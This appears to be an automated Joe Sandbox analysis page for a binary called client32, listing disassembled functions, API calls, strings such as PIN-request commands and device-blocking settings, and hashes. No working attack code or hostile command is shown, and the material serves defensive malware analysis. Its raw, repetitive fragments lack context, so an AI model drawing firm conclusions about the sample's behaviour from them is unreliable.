Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ExitProcess$CountErrorLastMessageTick_strrchrwsprintf
String ID: Assert failed, file %hs, line %d, error code %dBuild: %hsExpression: %s$Assert. File %hs, line %d, err %d, Expr %s$Client32$Info. assert, restarting...$V12.10F4
API String ID: 2763122592-3703414834
Opcode ID: 46b0b576eeee1707cfa4597fddd227d26b12d5d0a7ecbe0e050bda6c28fca704
Instruction ID: 0c35b4c0934c547b9efc755c54c54cf2bc7aea1eab2dc2738ce497f42af58575
Opcode Fuzzy Hash: 46b0b576eeee1707cfa4597fddd227d26b12d5d0a7ecbe0e050bda6c28fca704
Instruction Fuzzy Hash: 8D310B75A0122AAFE711DFE5CCC5FBAB7A9EB4470CF104028F72587281E670A940CB61

Function 1113B200 Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 252COMMON

Download Yara Rule

APIs

Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477

std::exception::exception.LIBCMT ref: 1113B29B
__CxxThrowException@8.LIBCMT ref: 1113B2B0
SetPropA.USER32(?,?,00000000), ref: 1113B33E
GetPropA.USER32(?), ref: 1113B34D
wsprintfA.USER32 ref: 1113B37F
RemovePropA.USER32(?), ref: 1113B3B1

Strings

UI.CPP, xrefs: 1113B301, 1113B322, 1113B392
hWnd=%x, uiMsg=x%x, wP=x%x, lP=x%x, xrefs: 1113B379
NSMStatsWindow::m_aProp, xrefs: 1113B327

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Prop$wsprintf$Exception@8RemoveThrow_memsetstd::exception::exception
String ID: NSMStatsWindow::m_aProp$UI.CPP$hWnd=%x, uiMsg=x%x, wP=x%x, lP=x%x
API String ID: 1006086998-1590351400
Opcode ID: 01c1f07ef8b6b209979e896109e748aae703513a6db7c0a7f24b0c6da771398e
Instruction ID: 61aa09a3932057afedc91f8550a7d54e25a2d8e58743395c812a8a85ab32a301
Opcode Fuzzy Hash: 01c1f07ef8b6b209979e896109e748aae703513a6db7c0a7f24b0c6da771398e
Instruction Fuzzy Hash: AA71E975E112299FD710CFA9DD80BAEF7B8FB88325F40456FE90AD7244D634A900CBA5

Function 68C75DF0 Relevance: 17.7, APIs: 2, Strings: 8, Instructions: 248COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 68C75E36

Part of subcall function 68C733A0: wsprintfA.USER32 ref: 68C734FD

Part of subcall function 68C77D00: __vswprintf.LIBCMT ref: 68C77D26

Strings

CMD=CONTROL_PIN_REQUEST, xrefs: 68C75EC9
0x0x0x0, xrefs: 68C75FCE
226546, xrefs: 68C75ED4, 68C75F15
CMD=CLIENT_PIN_REQUEST, xrefs: 68C75F0A
CLIENT_NAME=%s, xrefs: 68C75EDF, 68C75F20
>???.???.???.???, xrefs: 68C75F6A
%02X%02X%02X%02X%02X%02X, xrefs: 68C76032
PINserver, xrefs: 68C75E47

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: __vswprintf_memsetwsprintf
String ID: %02X%02X%02X%02X%02X%02X$0x0x0x0$226546$>???.???.???.???$CLIENT_NAME=%s$CMD=CLIENT_PIN_REQUEST$CMD=CONTROL_PIN_REQUEST$PINserver
API String ID: 518437271-441936534
Opcode ID: f68ca50bf6b33f3af291bfe442a10108ffd4f4dc7a0af6a6f9f33170c33f60f3
Instruction ID: d251bb10cf5d5bab395ed3145ebd8dfc0d92c56e160e4a681fafd7330089c24f
Opcode Fuzzy Hash: f68ca50bf6b33f3af291bfe442a10108ffd4f4dc7a0af6a6f9f33170c33f60f3
Instruction Fuzzy Hash: A891A9B5C4025CAEDB20DB64CC94FFEB7B8EB05314F8046AAE519B7180F7355A85CB64

Function 110FD040 Relevance: 17.7, APIs: 4, Strings: 6, Instructions: 155threadCOMMON

Download Yara Rule

APIs

Part of subcall function 1105D340: __wcstoi64.LIBCMT ref: 1105D37D

GetLastError.KERNEL32(Client,00000000,00000001,00000000), ref: 110FD146
GetCurrentThreadId.KERNEL32 ref: 110FD17C
GetCurrentThreadId.KERNEL32 ref: 110FD18A

Strings

Client, xrefs: 110FD089, 110FD114
LogWhileConnected, xrefs: 110FD10F
PLATFORM.CPP, xrefs: 110FD159
Event. %s, xrefs: 110FD1A6
*Log_%d, xrefs: 110FD06C
nstrings <= 4, xrefs: 110FD15E

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CurrentThread$ErrorLast__wcstoi64
String ID: *Log_%d$Client$Event. %s$LogWhileConnected$PLATFORM.CPP$nstrings <= 4
API String ID: 2021241812-3565238984
Opcode ID: eb309260b65eb184e950d2832ff89cbda71d3e6208cd11c1851e8b991c9664c9
Instruction ID: fb898e99375fe03a3fe41083e55742ce7b0b576ff4a7e429a818e7135f918612
Opcode Fuzzy Hash: eb309260b65eb184e950d2832ff89cbda71d3e6208cd11c1851e8b991c9664c9
Instruction Fuzzy Hash: 72514935E00117ABDB11CFA5CC86FBEBBA9FF85718F104579F92597280E734A80187A1

Function 68C77F80 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 154libraryloaderCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 68C77F9F
LoadLibraryA.KERNEL32(iphlpapi.dll,?,00000000,?,?,?,?,?,?,?,?,68C6B916,?,00000100,00000006,00000001), ref: 68C77FAC
GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 68C77FCB
_malloc.LIBCMT ref: 68C77FFB
wsprintfA.USER32 ref: 68C7807C
_free.LIBCMT ref: 68C78110

Part of subcall function 68C81BFD: HeapFree.KERNEL32(00000000,00000000), ref: 68C81C13
Part of subcall function 68C81BFD: GetLastError.KERNEL32(00000000), ref: 68C81C25

FreeLibrary.KERNEL32(00000000,?,00000000,?), ref: 68C7811C

Strings

iphlpapi.dll, xrefs: 68C77FA7
GetAdaptersInfo, xrefs: 68C77FC5
%02X%02X%02X%02X%02X%02X, xrefs: 68C78076

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: FreeLibrary$AddressErrorHeapLastLoadProc_free_malloc_memsetwsprintf
String ID: %02X%02X%02X%02X%02X%02X$GetAdaptersInfo$iphlpapi.dll
API String ID: 1404005415-834977148
Opcode ID: c440439ed0b5a0d47efde365829df2577fc004306448a663c4398358e21319e1
Instruction ID: 679111c21746609059a0a10c02d2bcc14a1109bf4e42e21637ee67a4635ffed6
Opcode Fuzzy Hash: c440439ed0b5a0d47efde365829df2577fc004306448a663c4398358e21319e1
Instruction Fuzzy Hash: BF5113B1A0420A9BDF10CFB898A4EEE7BF9EF09304F444165EE65AB241F731D906C760

Function 1103D180 Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 146COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 1103D1D3

Strings

RESUMEPRINTINGPRINTER=*FILETYPES=, xrefs: 1103D262
BLOCKPRINTING, xrefs: 1103D23D
e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 1103D27F
BLOCKPRINTINGPRINTER=*FILETYPES=BLOCK=1, xrefs: 1103D25B
SETUSBMASSSTORAGEACCESS, xrefs: 1103D1E3
SETOPTICALDRIVEACCESS, xrefs: 1103D214
SETOPTICALDRIVEACCESSACCESSMODES=%u, xrefs: 1103D22F
SETUSBMASSSTORAGEACCESSACCESSMODES=%u, xrefs: 1103D206
IsA(), xrefs: 1103D284

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: BLOCKPRINTING$BLOCKPRINTINGPRINTER=*FILETYPES=BLOCK=1$IsA()$RESUMEPRINTINGPRINTER=*FILETYPES=$SETOPTICALDRIVEACCESS$SETOPTICALDRIVEACCESSACCESSMODES=%u$SETUSBMASSSTORAGEACCESS$SETUSBMASSSTORAGEACCESSACCESSMODES=%u$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
API String ID: 4104443479-1830555902
Opcode ID: 952331b7223306ca7450c8f18610b3119baf94f2aaa2caf242e55afce37e2c4c
Instruction ID: 0533b61ff5f256c00753904ec1df5a7198c5ed9dcfad6114a4b50a325be8fdd6
Opcode Fuzzy Hash: 952331b7223306ca7450c8f18610b3119baf94f2aaa2caf242e55afce37e2c4c
Instruction Fuzzy Hash: BE41B779A1021AAFCB01CF94CC90FEEB7F8EF55319F044569E855A7241EB35E904C7A1

Function 11045364 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 217COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(00000000), ref: 1104545D
GetTickCount.KERNEL32 ref: 110454A6
GetTickCount.KERNEL32 ref: 110454C6

Strings

IsMember(%ls, %ls) ret %d, took %u ms, xrefs: 110454E6
RecIsMember(%ls, %ls) ret %d, took %u ms, xrefs: 11045544

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CountTick$FreeString
String ID: IsMember(%ls, %ls) ret %d, took %u ms$RecIsMember(%ls, %ls) ret %d, took %u ms
API String ID: 2011556836-2400621309
Opcode ID: 4996816fcb2d09a22c30fafb4ed933fee1bc220f868133df278643c3e2cb817a
Instruction ID: 400cf60c0998823ea0bb6020a3248241c8ed3d764918c69dd9f09d3b4840e21c
Opcode Fuzzy Hash: 4996816fcb2d09a22c30fafb4ed933fee1bc220f868133df278643c3e2cb817a
Instruction Fuzzy Hash: AE816471E0021A9BDB20DF54CC90BAAB3B5EF88714F1045E8D909D7A84EB75AE81CF90

Function 11059020 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 164synchronizationtimeCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000003E8,62C07B5E), ref: 11059069
EnterCriticalSection.KERNEL32(?), ref: 110590CE
timeGetTime.WINMM ref: 110590FC
GetTickCount.KERNEL32 ref: 11059136
LeaveCriticalSection.KERNEL32(?), ref: 110591AA
EnterCriticalSection.KERNEL32(?), ref: 110591C4
LeaveCriticalSection.KERNEL32(?), ref: 110591E9

Strings

_License, xrefs: 11059167
maxslaves, xrefs: 11059162

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$CountObjectSingleTickTimeWaittime
String ID: _License$maxslaves
API String ID: 3724810986-253336860
Opcode ID: 1a5778744d7334ab928a4606c54cc66baf7cb7b46047f7e118299d17b48d35e6
Instruction ID: b9473765ee5a894416c22d4106f00ac8eee3be5f778696d0a0a90b9ce83e720c
Opcode Fuzzy Hash: 1a5778744d7334ab928a4606c54cc66baf7cb7b46047f7e118299d17b48d35e6
Instruction Fuzzy Hash: 49518E71E006269BCB85CFA5C884A6EFBF9FB49704B10866DE925D7244F730E910CBA1

Function 1104B12F Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 126windowCOMMON

Download Yara Rule

APIs

Part of subcall function 1105D340: __wcstoi64.LIBCMT ref: 1105D37D

PostMessageA.USER32(0000FFFF,0000C19D,00000000,00000000), ref: 1104B225
PostMessageA.USER32(000301CE,0000048F,00000032,00000000), ref: 1104B256
PostMessageA.USER32(000301CE,00000483,00000000,00000000), ref: 1104B268
PostMessageA.USER32(000301CE,0000048F,000000C8,00000000), ref: 1104B27C
PostMessageA.USER32(000301CE,00000483,00000001,?), ref: 1104B293
PostMessageA.USER32(000301CE,00000800,00000000,00000000), ref: 1104B2A4

Strings

Client, xrefs: 1104B13C
tVPq, xrefs: 1104B165
UnloadMirrorOnEndView, xrefs: 1104B137

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: MessagePost$__wcstoi64
String ID: Client$UnloadMirrorOnEndView$tVPq
API String ID: 1802880851-2026197083
Opcode ID: f90317bc389818a7d6923112d6339fcabc99c06439f7a0e866445f586ece45cc
Instruction ID: 72b0dfb70f0a874fb1e004092d90b5695b323917c743566986231bfe2b7fd1fa
Opcode Fuzzy Hash: f90317bc389818a7d6923112d6339fcabc99c06439f7a0e866445f586ece45cc
Instruction Fuzzy Hash: E6412775B025257BD311DBA4CC85FEBB7AABF89708F1081A9F61497284DB70B900CBD4

Function 68C77810 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 125networkCOMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 68C7783E
#16.WSOCK32(?,?,?,00000000), ref: 68C778F6
WSAGetLastError.WSOCK32(?,?,?,00000000), ref: 68C77924
wsprintfA.USER32 ref: 68C77937
OutputDebugStringA.KERNEL32(?), ref: 68C77944

Strings

, xrefs: 68C77863
httputil.c, xrefs: 68C778CA
hbuf->data, xrefs: 68C778CF
(Httputil.c) Error %d reading HTTP response header, xrefs: 68C77931

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: DebugErrorLastOutputString_memmovewsprintf
String ID: $(Httputil.c) Error %d reading HTTP response header$hbuf->data$httputil.c
API String ID: 2214935655-769711038
Opcode ID: eaa0b950eff103784145dea2e7d54954f03c15672e875473b4e210ad430e9751
Instruction ID: 4c21b04ce328894edb81e4e6da9fb00f760d1b782be495791578c5310ef2dd6d
Opcode Fuzzy Hash: eaa0b950eff103784145dea2e7d54954f03c15672e875473b4e210ad430e9751
Instruction Fuzzy Hash: 3B419479A006059FE720DF64DC45E6B77F8EF48318B40882DE89A97A01F770F805DB90

Function 68C66A40 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 114libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(wininet.dll,00002000,00000000,00000000), ref: 68C66ABD
GetProcAddress.KERNEL32(00000000,InternetQueryOptionA), ref: 68C66ACF
FreeLibrary.KERNEL32(00000000), ref: 68C66AFC
wsprintfA.USER32 ref: 68C66B52
_free.LIBCMT ref: 68C66B96
_free.LIBCMT ref: 68C66BA2

Strings

InternetQueryOptionA, xrefs: 68C66AC9
wininet.dll, xrefs: 68C66A80
http://%s/testpage.htm, xrefs: 68C66B40

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: Library_free$AddressFreeLoadProcwsprintf
String ID: InternetQueryOptionA$http://%s/testpage.htm$wininet.dll
API String ID: 3641295650-227718810
Opcode ID: ac7a61b4e5c7f31aed8e6da8319d3d3226519a058e65241ed8d8b26a0f10de39
Instruction ID: 90f945819c5c45d5ead677caebaf17575198d630f435d87093e1cc3ed0c9e368
Opcode Fuzzy Hash: ac7a61b4e5c7f31aed8e6da8319d3d3226519a058e65241ed8d8b26a0f10de39
Instruction Fuzzy Hash: A14132B5D405199BDB64CF68CC85FEEB7B8AB44314F4081E9EA1DA7200FB709A859F90

Function 11027310 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 89COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000028,?), ref: 1102732F
OpenProcessToken.ADVAPI32(00000000), ref: 11027336
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,00000000,?), ref: 11027358
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?), ref: 11027378
LookupPrivilegeNameA.ADVAPI32(00000000,00000004,?,?), ref: 11027399
_free.LIBCMT ref: 110273C4
CloseHandle.KERNEL32(?), ref: 110273D6

Strings

@, xrefs: 1102738E
